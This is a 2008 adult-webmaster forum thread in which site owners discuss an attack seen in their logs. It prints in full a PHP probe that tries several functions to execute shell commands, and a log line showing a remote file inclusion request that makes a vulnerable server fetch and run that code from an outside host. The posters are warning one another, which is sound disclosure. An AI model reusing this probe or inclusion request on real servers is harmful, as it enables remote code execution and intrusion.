Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Who are TOPYN.COM and why they have this code on their site ???? Who are TOPYN.COM and why they have this code on their site ????
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 08-23-2008, 01:51 PM   #1
directfiesta
Too lazy to set a custom title
 
directfiesta's Avatar
 
Industry Role:
Join Date: Oct 2002
Location: Montreal, Quebec
Posts: 29,665
Who are TOPYN.COM and why they have this code on their site ????
http://www.topyn.com/ips.txt

PHP Code:
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
A few entries in my paysite logs .... as well as a ton listed on google : view seach

Hacking shit again ????
__________________
I know that Asspimple is stoopid ... As he says, it is a FACT !

But I can't figure out how he can breathe or type , at the same time ....
directfiesta is online now   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-23-2008, 02:45 PM   #2
fatfoo
ICQ:649699063
 
Industry Role:
Join Date: Mar 2003
Posts: 27,763
could be hacking shit again
__________________
Send me an email: [email protected]
fatfoo is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-23-2008, 02:57 PM   #3
bobby666
boots are my religion
 
bobby666's Avatar
 
Join Date: Nov 2005
Location: Heart of europe
Posts: 21,765
thanks, now i have a virus alert on my pc
__________________
bobby666 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 08-23-2008, 03:34 PM   #4
directfiesta
Too lazy to set a custom title
 
directfiesta's Avatar
 
Industry Role:
Join Date: Oct 2002
Location: Montreal, Quebec
Posts: 29,665
Quote:
Originally Posted by bobby666 View Post
thanks, now i have a virus alert on my pc
First, script was posted ... and there is no virus in that ....

Quote:
80.93.54.47 ... GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt? HTTP/1.1

That referenced URL still works, so if you want you can retrieve the 'exploit' code. But all it apparently does is to try various methods to execute "id", probably to locate web servers that are vulnerable and maybe even running as "root" user.

Obviously this is a brute force; that site doesn't have an index.php.

Is that anything new? Or is it just some script kiddie trying to re-use an aged exploit? But on the other hand, I havn't seen such a suhosin alert in months. Anybody knows which PHP script might be vulnerable to this attack vector.


[Update: I've received two mails pointing out that such vulnerablities are found in some PHP apps every now and then, so it might just be some script kiddie scanning brute force once more. Supposedly this cannot be exploited when register_globals is off and/or suhosin is used.]
AVG:

"Scan ""Shell extension scan"" was finished."
"Infections found:";"0"
"Infected objects removed or healed:";"0"
"Not removed or healed:";"0"
"Spyware found:";"0"
"Spyware removed:";"0"
"Not removed:";"0"
"Warnings count:";"0"
"Information count:";"0"
"Scan started:";"Saturday, August 23, 2008, 6:35:38 PM"
"Scan finished:";"Saturday, August 23, 2008, 6:35:39 PM (less than one second)"
"Total object scanned:";"1"
"User who launched the scan:";"User"
__________________
I know that Asspimple is stoopid ... As he says, it is a FACT !

But I can't figure out how he can breathe or type , at the same time ....
Last edited by directfiesta; 08-23-2008 at 03:37 PM..
directfiesta is online now   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Who are TOPYN.COM and why they have this code on their site ???? Who are TOPYN.COM and why they have this code on their site ????
« Previous Thread | Next Thread »

Bookmarks



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.